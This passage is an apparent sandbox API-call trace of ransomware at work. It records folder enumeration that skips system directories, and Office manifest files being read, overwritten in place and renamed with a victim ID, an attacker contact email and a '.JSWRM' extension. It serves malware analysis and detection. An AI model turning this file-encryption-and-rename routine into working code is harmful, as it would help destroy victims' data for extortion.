(in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0072.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0072.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0072.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.656] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0072.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0072.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0072.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.656] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x831d63af, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83543a09, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x573e5, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", cAlternateFileName="APPXMA~1.XML")) returned 1 [0072.656] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.656] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.656] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.656] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.656] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.657] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.657] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.657] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.657] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.657] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0072.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0072.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0072.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0072.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20de78, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0072.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0072.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0072.657] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.658] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=357349) returned 1 [0072.658] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24b1c8 [0072.658] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x27100, lpOverlapped=0x0) returned 1 [0072.671] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.671] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x27100, lpOverlapped=0x0) returned 1 [0072.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.672] CloseHandle (hObject=0x458) returned 1 [0072.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0072.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0072.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0072.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0072.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0072.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.672] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0072.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0072.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0072.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.775] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83e3474a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83e3474a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", cAlternateFileName="AP6206~1.XML")) returned 1 [0072.775] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.775] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.775] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.775] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.775] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.775] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.775] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.775] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.775] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.775] lstrcmpiW (lpString1="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0072.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0072.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0072.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0072.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20de78, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0072.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0072.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0072.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0072.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.776] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1261) returned 1 [0072.776] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0072.776] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x4e0, lpOverlapped=0x0) returned 1 [0072.778] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.778] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x4e0, lpOverlapped=0x0) returned 1 [0072.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0072.778] CloseHandle (hObject=0x458) returned 1 [0072.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0072.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0072.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0072.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0072.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0072.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.779] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0072.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0072.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0072.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.779] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834d1316, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834d1316, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8351d7a8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xfdea, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", cAlternateFileName="APD1EA~1.XML")) returned 1 [0072.779] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.779] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.779] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.779] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.779] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.779] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.779] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.779] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.779] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.779] lstrcmpiW (lpString1="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0072.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0072.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0072.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0072.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0072.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0072.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0072.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.781] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=65002) returned 1 [0072.781] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xfde0) returned 0x24b1c8 [0072.781] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0xfde0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0xfde0, lpOverlapped=0x0) returned 1 